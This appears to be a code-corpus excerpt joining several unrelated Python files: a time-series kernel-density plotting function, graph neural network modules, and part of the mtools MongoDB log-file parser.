When using a secondary_y axis, automatically mark the time-series
plotted on the secondary axis in the legend.
scatter_matrix_diagonal : str
[optional, defaults to 'kde']
If plot type is 'scatter_matrix', this specifies the plot along the
diagonal. One of 'kde' for Kernel Density Estimation or 'hist'
for a histogram.
bootstrap_size : int
[optional, defaults to 50]
The size of the random subset for 'bootstrap' plot.
bootstrap_samples
[optional, defaults to 500]
The number of random subsets of 'bootstrap_size'.
norm_xaxis
DEPRECATED: use '--type="norm_xaxis"' instead.
norm_yaxis
DEPRECATED: use '--type="norm_yaxis"' instead.
lognorm_xaxis
DEPRECATED: use '--type="lognorm_xaxis"' instead.
lognorm_yaxis
DEPRECATED: use '--type="lognorm_yaxis"' instead.
xy_match_line : str
[optional, default is '']
Will add a match line where x == y. Set to a line style code.
grid
[optional, default is False]
Whether to plot grid lines on the major ticks.
label_rotation : int
[optional]
Rotation for major labels for bar plots.
label_skip : int
[optional]
Skip for major labels for bar plots.
drawstyle : str
[optional, default is 'default']
'default' connects the points with lines. The
steps variants produce step-plots. 'steps' is equivalent to 'steps-pre'
and is maintained for backward-compatibility.
ACCEPTS::
['default' | 'steps' | 'steps-pre' | 'steps-mid' | 'steps-post']
por
[optional]
Plot from first good value to last good value. Strips NANs
from beginning and end.
{force_freq}
invert_xaxis
[optional, default is False]
Invert the x-axis.
invert_yaxis
[optional, default is False]
Invert the y-axis.
plotting_position : str
[optional, default is 'weibull']
{plotting_position_table}
Only used for norm_xaxis, norm_yaxis, lognorm_xaxis,
lognorm_yaxis, weibull_xaxis, and weibull_yaxis.
prob_plot_sort_values : str
[optional, default is 'descending']
How to sort the values for the probability plots.
Only used for norm_xaxis, norm_yaxis, lognorm_xaxis,
lognorm_yaxis, weibull_xaxis, and weibull_yaxis.
{columns}
{start_date}
{end_date}
{clean}
{skiprows}
{index_type}
{names}
{source_units}
{target_units}
{round_index}
plot_styles: str
[optional, default is "default"]
Set the style of the plot. One or more of Matplotlib styles "classic",
"Solarize_Light2", "bmh", "dark_background", "fast", "fivethirtyeight",
"ggplot", "grayscale", "seaborn", "seaborn-bright",
"seaborn-colorblind", "seaborn-dark", "seaborn-dark-palette",
"seaborn-darkgrid", "seaborn-deep", "seaborn-muted",
"seaborn-notebook", "seaborn-paper", "seaborn-pastel",
"seaborn-poster", "seaborn-talk", "seaborn-ticks", "seaborn-white",
"seaborn-whitegrid", "tableau-colorblind10", and
SciencePlots styles "science", "grid", "ieee", "scatter", "notebook",
"high-vis", "bright", "vibrant", "muted", and "retro".
If multiple styles are given, each overrides some or all of the
characteristics of the previous one.
Color Blind Appropriate Styles
The styles "seaborn-colorblind", "tableau-colorblind10", "bright",
"vibrant", and "muted" are all styles that are setup to be able to be
distinguished by someone with color blindness.
Black, White, and Gray Styles
The "ieee" style is appropriate for black, white, and gray, however the
"ieee" also will change the chart size to fit in a column of the "IEEE"
journal.
The "grayscale" is another style useful for photo-copyable black,
white, nd gray.
Matplotlib styles:
https://matplotlib.org/3.3.1/gallery/style_sheets/style_sheets_reference.html
SciencePlots styles:
https://github.com/garrettj403/SciencePlots
hlines_y:
[optional, defaults to None]
Number or list of y values where to place a horizontal line.
hlines_xmin:
[optional, defaults to None]
List of minimum x values to start the horizontal lines. If a list, it
must be the same length as `hlines_y`. If a single number, it will be
used as the minimum x value for all horizontal lines. A missing value
or None will start at the minimum x value for the entire plot.
hlines_xmax:
[optional, defaults to None]
List of maximum x values to end each horizontal line. If a list, it
must be the same length as `hlines_y`. If a single number, it will be
the maximum x value for all horizontal lines. A missing value or None
will end at the maximum x value for the entire plot.
hlines_colors:
[optional, defaults to None]
List of colors for the horizontal lines. If a single color, it will be
used as the color for all horizontal lines. If a list, it must be the
same length as `hlines_y`. If None, colors are taken from the color
palette of the current plot style.
hlines_linestyles:
[optional, defaults to None]
List of linestyles for the horizontal lines. If a single linestyle, it
will be used as the linestyle for all horizontal lines. If a list, it
must be the same length as `hlines_y`. If None, linestyles are taken
from the standard linestyles list.
vlines_x:
[optional, defaults to None]
List of x values where to place a vertical line.
vlines_ymin:
[optional, defaults to None]
List of minimum y values to start the vertical lines. If a list, it
must be the same length as `vlines_x`. If a single number, it will be
used as the minimum y value for all vertical lines. A missing value or
None will start at the minimum y value for the entire plot.
vlines_ymax:
[optional, defaults to None]
List of maximum y values to end each vertical line. If a list, it must
be the same length as `vlines_x`. If a single number, it will be the
maximum y value for all vertical lines. A missing value or None will
end at the maximum y value for the entire plot.
vlines_colors:
[optional, defaults to None]
List of colors for the vertical lines. If a single color, it will be
used as the color for all vertical lines. If a list, it must be the
same length as `vlines_x`. If None, colors are taken from the color
palette of the current plot style.
vlines_linestyles:
[optional, defaults to None]
List of linestyles for the vertical lines. If a single linestyle, it
will be used as the linestyle for all vertical lines. If a list, it
must be the same length as `vlines_x`. If None, linestyles are taken
from the standard linestyles list.
"""
plt = kde(
input_ts=input_ts,
columns=columns,
start_date=start_date,
end_date=end_date,
clean=clean,
skiprows=skiprows,
index_type=index_type,
names=names,
ofilename=ofilename,
xtitle=xtitle,
ytitle=ytitle,
title=title,
figsize=figsize,
legend=legend,
legend_names=legend_names,
subplots=subplots,
sharex=sharex,
sharey=sharey,
colors=colors,
linestyles=linestyles,
markerstyles=markerstyles,
bar_hatchstyles=bar_hatchstyles,
style=style,
logx=logx,
logy=logy,
xaxis=xaxis,
yaxis=yaxis,
xlim=xlim,
ylim=ylim,
secondary_y=secondary_y,
mark_right=mark_right,
scatter_matrix_diagonal=scatter_matrix_diagonal,
bootstrap_size=bootstrap_size,
bootstrap_samples=bootstrap_samples,
norm_xaxis=norm_xaxis,
norm_yaxis=norm_yaxis,
lognorm_xaxis=lognorm_xaxis,
lognorm_yaxis=lognorm_yaxis,
xy_match_line=xy_match_line,
grid=grid,
label_rotation=label_rotation,
label_skip=label_skip,
force_freq=force_freq,
drawstyle=drawstyle,
por=por,
invert_xaxis=invert_xaxis,
invert_yaxis=invert_yaxis,
round_index=round_index,
plotting_position=plotting_position,
prob_plot_sort_values=prob_plot_sort_values,
source_units=source_units,
target_units=target_units,
lag_plot_lag=lag_plot_lag,
plot_styles=plot_styles,
hlines_y=hlines_y,
hlines_xmin=hlines_xmin,
hlines_xmax=hlines_xmax,
hlines_colors=hlines_colors,
hlines_linestyles=hlines_linestyles,
vlines_x=vlines_x,
vlines_ymin=vlines_ymin,
vlines_ymax=vlines_ymax,
vlines_colors=vlines_colors,
vlines_linestyles=vlines_linestyles,
)
# @tsutils.validator(
# ofilename=[str, ["pass", []], 1],
# type=[str, ["domain", ["kde",],], 1,],
# lag_plot_lag=[int, ["range", [1, None]], 1],
# xtitle=[str, ["pass", []], 1],
# ytitle=[str, ["pass", []], 1],
# title=[str, ["pass", []], 1],
# figsize=[float, ["range", [0, None]], 2],
# legend=[bool, ["domain", [True, False]], 1],
# legend_names=[str, ["pass", []], 1],
# subplots=[bool, ["domain", [True, False]], 1],
# sharex=[bool, ["domain", [True, False]], 1],
# sharey=[bool, ["domain", [True, False]], 1],
# colors=[str, ["pass", []], None],
# linestyles=[str, ["domain", ["auto", None, "", " ", " "] + plotutils.LINE_LIST], None],
# markerstyles=[str, ["domain", ["auto", None, "", " ", " "] + plotutils.MARKER_LIST], None],
# bar_hatchstyles=[str, ["domain", ["auto", None, "", " ", " "] + plotutils.HATCH_LIST], None],
# style=[str, ["pass", []], None],
# xlim=[float, ["pass", []], 2],
# ylim=[float, ["pass", []], 2],
# xaxis=[str, ["domain", ["arithmetic", "log"]], 1],
# yaxis=[str, ["domain", ["arithmetic", "log"]], 1],
# secondary_y=[bool, ["domain", [True, False]], 1],
# mark_right=[bool, ["domain", [True, False]], 1],
# scatter_matrix_diagonal=[str, ["domain", ["kde", "hist"]], 1],
# bootstrap_size=[int, ["range", [0, None]], 1],
# xy_match_line=[str, ["pass", []], 1],
# grid=[bool, ["domain", [True, False]], 1],
# label_rotation=[float, ["pass", []], 1],
# label_skip=[int, ["range", [1, None]], 1],
# drawstyle=[str, ["pass", []], 1],
# por=[bool, ["domain", [True, False]], 1],
# invert_xaxis=[bool, ["domain", [True, False]], 1],
# invert_yaxis=[bool, ["domain", [True, False]], 1],
# plotting_position=[
# str,
# [
# "domain",
# ["weibull", "benard", "tukey", "gumbel", "hazen", "cunnane", "california"],
# ],
# 1,
# ],
# prob_plot_sort_values=[str, ["domain", ["ascending", "descending"]], 1],
# plot_styles=[
# str,
# [
# "domain",
# [
# "classic",
# "Solarize_Light2",
# "bmh",
# "dark_background",
# "fast",
# "fivethirtyeight",
# "ggplot",
# "grayscale",
# "seaborn",
# "seaborn-bright",
# "seaborn-colorblind",
# "seaborn-dark",
# "seaborn-dark-palette",
# "seaborn-darkgrid",
# "seaborn-deep",
# "seaborn-muted",
# "seaborn-notebook",
# "seaborn-paper",
# "seaborn-pastel",
# "seaborn-poster",
# "seaborn-talk",
# "seaborn-ticks",
# "seaborn-white",
# "seaborn-whitegrid",
# "tableau-colorblind10",
# "science",
# "grid",
# "ieee",
# "scatter",
# "notebook",
# "high-vis",
# "bright",
# "vibrant",
# "muted",
# "retro",
# ],
# ],
# None,
# ],
# hlines_y=[float, ["pass", []], None],
# hlines_xmin=[float, ["pass", []], None],
# hlines_xmax=[float, ["pass", []], None],
# hlines_colors=[str, ["pass", []], None],
# hlines_linestyles=[
# str,
# ["domain", ["auto", None, "", " ", " "] + plotutils.LINE_LIST],
# None,
# ],
# vlines_x=[float, ["pass", []], None],
# vlines_ymin=[float, ["pass", []], None],
# vlines_ymax=[float, ["pass", []], None],
# vlines_colors=[str, ["pass", []], None],
# vlines_linestyles=[
# str,
# ["domain", ["auto", None, "", " ", " "] + plotutils.LINE_LIST],
# None,
# ],
# )
def kde(
input_ts="-",
columns=None,
start_date=None,
end_date=None,
clean=False,
skiprows=None,
index_type="datetime",
names=None,
ofilename="plot.png",
xtitle="",
ytitle="",
title="",
figsize="10,6.0",
legend=None,
legend_names=None,
subplots=False,
sharex=True,
sharey=False,
colors="auto",
linestyles="auto",
markerstyles=" ",
bar_hatchstyles="auto",
style="auto",
logx=False,
logy=False,
xaxis="arithmetic",
yaxis="arithmetic",
xlim=None,
ylim=None,
secondary_y=False,
mark_right=True,
scatter_matrix_diagonal="kde",
bootstrap_size=50,
bootstrap_samples=500,
norm_xaxis=False,
norm_yaxis=False,
lognorm_xaxis=False,
lognorm_yaxis=False,
xy_match_line="",
grid=False,
label_rotation=None,
label_skip=1,
force_freq=None,
drawstyle="default",
por=False,
invert_xaxis=False,
invert_yaxis=False,
round_index=None,
plotting_position="weibull",
prob_plot_sort_values="descending",
source_units=None,
target_units=None,
lag_plot_lag=1,
plot_styles="bright",
hlines_y=None,
hlines_xmin=None,
hlines_xmax=None,
hlines_colors=None,
hlines_linestyles="-",
vlines_x=None,
vlines_ymin=None,
vlines_ymax=None,
vlines_colors=None,
vlines_linestyles="-",
**kwds,
):
r"""Plot data."""
# Need to work around some old option defaults with the implementation of
# mando
legend = bool(legend == "" or legend == "True" or legend is None)
type = "kde"
import matplotlib
matplotlib.use("Agg")
import matplotlib.pyplot as plt
from matplotlib.ticker import FixedLocator
tsd = tsutils.common_kwds(
input_ts,
skiprows=skiprows,
names=names,
index_type=index_type,
start_date=start_date,
end_date=end_date,
pick=columns,
round_index=round_index,
dropna="all",
source_units=source_units,
target_units=target_units,
clean=clean,
por=por,
)
tsd, lnames = plotutils.check(type, tsd, legend_names)
# This is to help pretty print the frequency
try:
try:
pltfreq = str(tsd.index.freq, "utf-8").lower()
except TypeError:
pltfreq = str(tsd.index.freq).lower()
if pltfreq.split(" ")[0][1:] == "1":
beginstr = 3
else:
beginstr = 1
if pltfreq == "none":
short_freq = ""
else:
# short freq string (day) OR (2 day)
short_freq = "({})".format(pltfreq[beginstr:-1])
except AttributeError:
short_freq = ""
if colors == "auto":
colors = None
else:
colors = tsutils.make_list(colors)
if linestyles == "auto":
linestyles = plotutils.LINE_LIST
else:
linestyles = tsutils.make_list(linestyles)
if bar_hatchstyles == "auto":
bar_hatchstyles = plotutils.HATCH_LIST
else:
bar_hatchstyles = tsutils.make_list(bar_hatchstyles)
if markerstyles == "auto":
markerstyles = plotutils.MARKER_LIST
else:
markerstyles = tsutils.make_list(markerstyles)
if markerstyles is None:
markerstyles = " "
if style != "auto":
nstyle = tsutils.make_list(style)
if len(nstyle) != len(tsd.columns):
raise ValueError(
tsutils.error_wrapper(
"""
You have to have the same number of style strings as time-series to plot.
You supplied '{}' for style which has {} style strings,
but you have {} time-series.
""".format(
style, len(nstyle), len(tsd.columns)
)
)
)
colors = []
markerstyles = []
linestyles = []
for st in nstyle:
colors.append(st[0])
if len(st) == 1:
markerstyles.append(" ")
linestyles.append("-")
continue
if st[1] in plotutils.MARKER_LIST:
markerstyles.append(st[1])
try:
linestyles.append(st[2:])
except IndexError:
linestyles.append(" ")
else:
markerstyles.append(" ")
linestyles.append(st[1:])
if linestyles is None:
linestyles = [" "]
else:
linestyles = [" " if i in [" ", None] else i for i in linestyles]
markerstyles = [" " if i is None else i for i in markerstyles]
if colors is not None:
icolors = itertools.cycle(colors)
else:
icolors = None
imarkerstyles = itertools.cycle(markerstyles)
ilinestyles = itertools.cycle(linestyles)
# Only for bar, barh, bar_stacked, and barh_stacked.
ibar_hatchstyles = itertools.cycle(bar_hatchstyles)
if (
logx is True
or logy is True
or norm_xaxis is True
or norm_yaxis is True
or lognorm_xaxis is True
or lognorm_yaxis is True
):
warnings.warn(
"""
*
* The --logx, --logy, --norm_xaxis, --norm_yaxis, --lognorm_xaxis, and
* --lognorm_yaxis options are deprecated.
*
* For --logx use --xaxis="log"
* For --logy use --yaxis="log"
* For --norm_xaxis use --type="norm_xaxis"
* For --norm_yaxis use --type="norm_yaxis"
* For --lognorm_xaxis use --type="lognorm_xaxis"
* For --lognorm_yaxis use --type="lognorm_yaxis"
*
"""
)
if xaxis == "log":
logx = True
if yaxis == "log":
logy = True
xlim = plotutils.know_your_limits(xlim, axis=xaxis)
ylim = plotutils.know_your_limits(ylim, axis=yaxis)
plot_styles = tsutils.make_list(plot_styles) + ["no-latex"]
style_loc = os.path.join(
os.path.dirname(__file__), os.pardir, "SciencePlots_styles"
)
plot_styles = [
os.path.join(style_loc, i + ".mplstyle")
if os.path.exists(os.path.join(style_loc, i + ".mplstyle"))
else i
for i in plot_styles
]
plt.style.use(plot_styles)
figsize = tsutils.make_list(figsize, n=2)
_, ax = plt.subplots(figsize=figsize)
if type in ["kde", "probability_density"]:
ax = tsd.plot.kde(
legend=legend,
subplots=subplots,
sharex=sharex,
sharey=sharey,
style=None,
logx=logx,
logy=logy,
xlim=xlim,
ylim=ylim,
secondary_y=secondary_y,
figsize=figsize,
)
for index, line in enumerate(ax.lines):
if icolors is not None:
c = next(icolors)
else:
c = None
if imarkerstyles is not None:
m = next(imarkerstyles)
else:
m = None
if ilinestyles is not None:
l = next(ilinestyles)
else:
l = None
if c is not None:
plt.setp(line, color=c)
plt.setp(line, marker=m)
plt.setp(line, linestyle=l)
ytitle = ytitle or "Density"
if legend is True:
plt.legend(loc="best")
if hlines_y is not None:
hlines_y = tsutils.make_list(hlines_y)
hlines_xmin = tsutils.make_list(hlines_xmin)
hlines_xmax = tsutils.make_list(hlines_xmax)
hlines_colors = tsutils.make_list(hlines_colors)
hlines_linestyles = tsutils.make_list(hlines_linestyles)
nxlim = ax.get_xlim()
if hlines_xmin is None:
hlines_xmin = nxlim[0]
if hlines_xmax is None:
hlines_xmax = nxlim[1]
if vlines_x is not None:
vlines_x = tsutils.make_list(vlines_x)
vlines_ymin = tsutils.make_list(vlines_ymin)
vlines_ymax = tsutils.make_list(vlines_ymax)
vlines_colors = tsutils.make_list(vlines_colors)
vlines_linestyles = tsutils.make_list(vlines_linestyles)
nylim = ax.get_ylim()
if vlines_ymin is None:
vlines_ymin = nylim[0]
if vlines_ymax is None:
vlines_ymax = nylim[1]
if type in [
"time",
"xy",
"bar",
"bar_stacked",
"histogram",
"norm_xaxis",
"lognorm_xaxis",
"weibull_xaxis",
"norm_yaxis",
"lognorm_yaxis",
"weibull_yaxis",
]:
if hlines_y is not None:
if type in ["norm_yaxis", "lognorm_yaxis", "weibull_yaxis"]:
hlines_y = ppf(tsutils.make_list(hlines_y))
plt.hlines(
hlines_y,
hlines_xmin,
hlines_xmax,
colors=hlines_colors,
linestyles=hlines_linestyles,
)
if vlines_x is not None:
if type in ["norm_xaxis", "lognorm_xaxis", "weibull_xaxis"]:
vlines_x = ppf(tsutils.make_list(vlines_x))
plt.vlines(
vlines_x,
vlines_ymin,
vlines_ymax,
colors=vlines_colors,
linestyles=vlines_linestyles,
)
plt.xlabel(xtitle)
plt.ylabel(ytitle)
if invert_xaxis is True:
plt.gca().invert_xaxis()
if invert_yaxis is True:
plt.gca().invert_yaxis()
plt.grid(grid)
plt.title(title)
plt.tight_layout()
if ofilename is not None:
plt.savefig(ofilename)
return plt
kde.__doc__ = kde_cli.__doc__
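if __name__ == "__main__":
    # Minimal usage sketch added for illustration; it is not part of the
    # original module.  It assumes a file named "data.csv" exists with a
    # datetime index and at least one numeric column -- both the file name
    # and its contents are hypothetical.
    kde(input_ts="data.csv", ofilename="kde_example.png", title="KDE example")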
| 2.09375 | 2 |
src/models/GNN.py | 3verlyn/DL-abstract-argumentation | 6 | 1292 | from collections import OrderedDict
import torch
import torch.nn as nn
from torch_geometric.data.batch import Batch
class GNN(nn.Module):
def __init__(self, mp_steps, **config):
super().__init__()
self.mp_steps = mp_steps
self.update_fns = self.assign_update_fns()
self.readout_fns = self.assign_readout_fns()
def assign_update_fns(self) -> OrderedDict:
raise NotImplementedError
def assign_readout_fns(self) -> dict:
raise NotImplementedError
def forward(self, batch: Batch, output_all_steps=True):
edge_index = batch.edge_index
sections = (
torch.bincount(batch.batch).tolist() if hasattr(batch, "batch") else None
)
hiddens = self.initialize(batch)
del batch
# update attributes with update and aggregation step
outputs = {element: [] for element in self.readout_fns.keys()}
for step in range(self.mp_steps):
hiddens = self.step(edge_index=edge_index, sections=sections, **hiddens)
if not output_all_steps and (step + 1) != self.mp_steps:
continue
for element, readout_fn in self.readout_fns.items():
outputs[element].append(readout_fn(**hiddens))
return outputs
def initialize(self, batch):
hiddens = {}
# initialize attributes through embeddings and initialize lstm states to None
for element in self.embeddings.keys():
embedding = self.embeddings[element](batch[f"{element}_input"])
hiddens.update(
{
f"{element}_input": embedding,
f"{element}_embedding": embedding.clone(),
f"{element}_lstm": None,
}
)
return hiddens
def step(self, edge_index, sections, **hiddens):
"""
Perform a message passing step by propagating information and updating each element
"""
for element, update_fn in self.update_fns.items():
hiddens[f"{element}_embedding"], hiddens[f"{element}_lstm"] = update_fn(
edge_index=edge_index, sections=sections, element=element, **hiddens
)
return hiddens
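# ---------------------------------------------------------------------------
# Illustration added for clarity; it is not part of the original project.
# A minimal concrete subclass showing how ``assign_update_fns``,
# ``assign_readout_fns`` and ``self.embeddings`` are expected to fit
# together.  The single "node" element, the linear update, and the scalar
# readout are hypothetical stand-ins for the real update/readout networks.
# ---------------------------------------------------------------------------
class ToyGNN(GNN):
    """Sketch only: one element type, a linear update, a scalar readout."""

    def __init__(self, mp_steps=3, state_dim=8):
        super().__init__(mp_steps)
        # used by GNN.initialize(); maps the raw "node_input" to embeddings
        self.embeddings = nn.ModuleDict({"node": nn.Linear(1, state_dim)})
        self.update_net = nn.Linear(state_dim, state_dim)
        self.readout_net = nn.Linear(state_dim, 1)

    def assign_update_fns(self) -> OrderedDict:
        return OrderedDict([("node", self._update_node)])

    def assign_readout_fns(self) -> dict:
        return {"node": self._readout_node}

    def _update_node(self, edge_index, sections, element, **hiddens):
        # a real model would aggregate neighbour states over ``edge_index``
        # before updating; this sketch only transforms the node embeddings
        new_embedding = torch.relu(self.update_net(hiddens["node_embedding"]))
        return new_embedding, hiddens["node_lstm"]

    def _readout_node(self, **hiddens):
        return torch.sigmoid(self.readout_net(hiddens["node_embedding"]))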
| 2.34375 | 2 |
configs/baselines/DACN/GNN/GCN_res_layer.py | vivek-r-2000/BoundaryNet | 17 | 1293 | <reponame>vivek-r-2000/BoundaryNet<gh_stars>10-100
import math
import torch
import torch.nn as nn
from torch.nn.modules.module import Module
from GNN.GCN_layer import GraphConvolution
class GraphResConvolution(Module):
"""
Simple GCN layer, similar to https://arxiv.org/abs/1609.02907
"""
def __init__(self, state_dim, name=''):
super(GraphResConvolution, self).__init__()
self.state_dim = state_dim
self.gcn_1 = GraphConvolution(state_dim, '%s_1' % name)
self.gcn_2 = GraphConvolution(state_dim, '%s_2' % name)
self.relu1 = nn.ReLU()
self.relu2 = nn.ReLU()
self.name = name
def forward(self, input, adj):
output_1 = self.gcn_1(input, adj)
output_1_relu = self.relu1(output_1)
output_2 = self.gcn_2(output_1_relu, adj)
output_2_res = output_2 + input
output = self.relu2(output_2_res)
return output
def __repr__(self):
return self.__class__.__name__ + ' (' + self.name + ')' | 2.8125 | 3 |
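# ---------------------------------------------------------------------------
# Illustration added for clarity; it is not part of the original repository.
# A tiny forward pass through the residual block.  The (batch, nodes,
# state_dim) feature shape and the identity adjacency are assumptions here,
# since GraphConvolution itself is defined in GNN/GCN_layer.py.
# ---------------------------------------------------------------------------
# layer = GraphResConvolution(state_dim=64, name='res_gcn_demo')
# x = torch.randn(1, 40, 64)              # node features
# adj = torch.eye(40).unsqueeze(0)        # placeholder adjacency matrix
# out = layer(x, adj)                     # same shape as x: (1, 40, 64)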
mtools/util/logfile.py | lukasvosyka/mtools | 0 | 1294 | <gh_stars>0
#!/usr/bin/env python3
from __future__ import print_function
import os
import re
import sys
from datetime import datetime
from math import ceil
from mtools.util.input_source import InputSource
from mtools.util.logevent import LogEvent
class LogFile(InputSource):
"""Log file wrapper class. Handles open file streams or stdin."""
def __init__(self, filehandle):
"""Provide logfile as open file stream or stdin."""
self.filehandle = filehandle
self.name = filehandle.name
self.from_stdin = filehandle.name == "<stdin>"
self._bounds_calculated = False
self._start = None
self._end = None
self._filesize = None
self._num_lines = None
self._restarts = None
self._binary = None
self._timezone = None
self._hostname = None
self._port = None
self._rs_state = None
self._repl_set = None
self._repl_set_members = None
self._repl_set_version = None
self._repl_set_protocol = None
self._storage_engine = None
self._datetime_format = None
self._year_rollover = None
self._shards = None
self._csrs = None
self._chunks_moved_from = None
self._chunks_moved_to = None
self._chunk_splits = None
# Track previous file position for loop detection in _find_curr_line()
self.prev_pos = None
self._has_level = None
# make sure bounds are calculated before starting to iterate,
# including potential year rollovers
self._calculate_bounds()
@property
def start(self):
"""
Lazy evaluation of start and end of logfile.
Returns None for stdin input currently.
"""
if not self._start:
self._calculate_bounds()
return self._start
@property
def end(self):
"""
Lazy evaluation of start and end of logfile.
Returns None for stdin input currently.
"""
if not self._end:
self._calculate_bounds()
return self._end
@property
def timezone(self):
"""Lazy evaluation of timezone of logfile."""
if not self._timezone:
self._calculate_bounds()
return self._timezone
@property
def filesize(self):
"""
Lazy evaluation of start and end of logfile.
Returns None for stdin input currently.
"""
if self.from_stdin:
return None
if not self._filesize:
self._calculate_bounds()
return self._filesize
@property
def datetime_format(self):
"""Lazy evaluation of the datetime format."""
if not self._datetime_format:
self._calculate_bounds()
return self._datetime_format
@property
def has_level(self):
"""Lazy evaluation of the whether the logfile has any level lines."""
if self._has_level is None:
self._iterate_lines()
return self._has_level
@property
def year_rollover(self):
"""Lazy evaluation of the datetime format."""
if self._year_rollover is None:
self._calculate_bounds()
return self._year_rollover
@property
def num_lines(self):
"""
Lazy evaluation of the number of lines.
Returns None for stdin input currently.
"""
if self.from_stdin:
return None
if not self._num_lines:
self._iterate_lines()
return self._num_lines
@property
def restarts(self):
"""Lazy evaluation of all restarts."""
if not self._num_lines:
self._iterate_lines()
return self._restarts
@property
def rs_state(self):
"""Lazy evaluation of all restarts."""
if not self._num_lines:
self._iterate_lines()
return self._rs_state
@property
def binary(self):
"""Lazy evaluation of the binary name."""
if not self._num_lines:
self._iterate_lines()
return self._binary
@property
def hostname(self):
"""Lazy evaluation of the binary name."""
if not self._num_lines:
self._iterate_lines()
return self._hostname
@property
def port(self):
"""Lazy evaluation of the binary name."""
if not self._num_lines:
self._iterate_lines()
return self._port
@property
def versions(self):
"""Return all version changes."""
versions = []
for v, _ in self.restarts:
if len(versions) == 0 or v != versions[-1]:
versions.append(v)
return versions
@property
def repl_set(self):
"""Return the replSet (if available)."""
if not self._num_lines:
self._iterate_lines()
return self._repl_set
@property
def repl_set_members(self):
"""Return the replSet (if available)."""
if not self._num_lines:
self._iterate_lines()
return self._repl_set_members
@property
def repl_set_version(self):
"""Return the replSet (if available)."""
if not self._num_lines:
self._iterate_lines()
return self._repl_set_version
@property
def repl_set_protocol(self):
"""Return the replSet protocolVersion (if available)."""
if not self._num_lines:
self._iterate_lines()
return self._repl_set_protocol
@property
def storage_engine(self):
"""Return storage engine if available."""
if not self._num_lines:
self._iterate_lines()
return self._storage_engine
@property
def shards(self):
"""Lazily return the shards (if available)"""
if not self._shards:
self._find_sharding_info()
return self._shards
@property
def csrs(self):
"""Lazily return the CSRS (if available)"""
if not self._csrs:
self._find_sharding_info()
return self._csrs
@property
def chunks_moved_to(self):
"""Lazily return the chunks moved to this shard (if available)"""
if not self._chunks_moved_to:
self._find_sharding_info()
return self._chunks_moved_to
@property
def chunks_moved_from(self):
"""Lazily return the chunks moved from this shard (if available)"""
if not self._chunks_moved_from:
self._find_sharding_info()
return self._chunks_moved_from
@property
def chunk_splits(self):
"""Lazily return the chunks split in this shard (if available)"""
if not self._chunk_splits:
self._find_sharding_info()
return self._chunk_splits
def next(self):
"""Get next line, adjust for year rollover and hint datetime format."""
# use readline here because next() iterator uses internal readahead
# buffer so seek position is wrong
line = self.filehandle.readline()
if isinstance(line, bytes):
line = line.decode('utf-8', 'replace')
if line == '':
raise StopIteration
line = line.rstrip('\n')
le = LogEvent(line)
# hint format and nextpos from previous line
if self._datetime_format and self._datetime_nextpos is not None:
ret = le.set_datetime_hint(self._datetime_format,
self._datetime_nextpos,
self.year_rollover)
if not ret:
# logevent indicates timestamp format has changed,
# invalidate hint info
self._datetime_format = None
self._datetime_nextpos = None
elif le.datetime:
# gather new hint info from another logevent
self._datetime_format = le.datetime_format
self._datetime_nextpos = le._datetime_nextpos
return le
def __iter__(self):
"""
Iterate over LogFile object.
Return a LogEvent object for each line (generator).
"""
le = None
while True:
try:
le = self.next()
except StopIteration as e:
# end of log file, get end date
if not self.end and self.from_stdin:
if le and le.datetime:
self._end = le.datetime
# future iterations start from the beginning
if not self.from_stdin:
self.filehandle.seek(0)
# return (instead of raising StopIteration exception) per PEP 479
return
# get start date for stdin input
if not self.start and self.from_stdin:
if le and le.datetime:
self._start = le.datetime
try:
yield le
except StopIteration:
return
states = (['PRIMARY', 'SECONDARY', 'DOWN', 'STARTUP', 'STARTUP2',
'RECOVERING', 'ROLLBACK', 'ARBITER', 'UNKNOWN'])
def __len__(self):
"""Return the number of lines in a log file."""
return self.num_lines
def _iterate_lines(self):
"""Count number of lines (can be expensive)."""
self._num_lines = 0
self._restarts = []
self._rs_state = []
ln = 0
for ln, line in enumerate(self.filehandle):
if isinstance(line, bytes):
line = line.decode("utf-8", "replace")
if (self._has_level is None and
line[28:31].strip() in LogEvent.log_levels and
line[31:39].strip() in LogEvent.log_components):
self._has_level = True
# find version string (fast check to eliminate most lines)
if "version" in line[:100]:
logevent = LogEvent(line)
restart = self._check_for_restart(logevent)
if restart:
self._restarts.append((restart, logevent))
if "starting :" in line or "starting:" in line:
# look for hostname, port
match = re.search('port=(?P<port>\d+).*host=(?P<host>\S+)',
line)
if match:
self._hostname = match.group('host')
self._port = match.group('port')
""" For 3.0 the "[initandlisten] options:" long entry contained the
"engine" field if WiredTiger was the storage engine. There were
only two engines, MMAPv1 and WiredTiger
"""
if "[initandlisten] options:" in line:
match = re.search('replSet: "(?P<replSet>\S+)"', line)
if match:
self._repl_set = match.group('replSet')
match = re.search('engine: "(?P<engine>\S+)"', line)
if match:
self._storage_engine = match.group('engine')
else:
self._storage_engine = 'mmapv1'
""" For 3.2 the "[initandlisten] options:" no longer contains the
"engine" field So now we have to look for the "[initandlisten]
wiredtiger_open config:" which was present in 3.0, but would
now tell us definitively that wiredTiger is being used
"""
if "[initandlisten] wiredtiger_open config:" in line:
self._storage_engine = 'wiredTiger'
if "command admin.$cmd command: { replSetInitiate:" in line:
match = re.search('{ _id: "(?P<replSet>\S+)", '
'members: (?P<replSetMembers>[^]]+ ])', line)
if match:
self._repl_set = match.group('replSet')
self._repl_set_members = match.group('replSetMembers')
# Replica set config logging in MongoDB 3.0+
new_config = ("New replica set config in use: ")
if new_config in line:
match = re.search('{ _id: "(?P<replSet>\S+)", '
'version: (?P<replSetVersion>\d+), ', line)
if match:
self._repl_set = match.group('replSet')
self._repl_set_version = match.group('replSetVersion')
match = re.search(', protocolVersion: (?P<replSetProtocol>\d+), ', line)
if match:
self._repl_set_protocol = match.group('replSetProtocol')
match = re.search('members: (?P<replSetMembers>[^]]+ ])', line)
if match:
self._repl_set_members = match.group('replSetMembers')
# if ("is now in state" in line and
# next(state for state in states if line.endswith(state))):
if "is now in state" in line:
tokens = line.split()
# 2.6
if tokens[1].endswith(']'):
pos = 4
else:
pos = 5
host = tokens[pos]
rs_state = tokens[-1]
state = (host, rs_state, LogEvent(line))
self._rs_state.append(state)
continue
if "[rsMgr] replSet" in line:
tokens = line.split()
if self._hostname:
host = self._hostname + ':' + self._port
else:
host = os.path.basename(self.name)
host += ' (self)'
if tokens[-1] in self.states:
rs_state = tokens[-1]
else:
# 2.6
if tokens[1].endswith(']'):
pos = 2
else:
pos = 6
rs_state = ' '.join(tokens[pos:])
state = (host, rs_state, LogEvent(line))
self._rs_state.append(state)
continue
self._num_lines = ln + 1
# reset logfile
self.filehandle.seek(0)
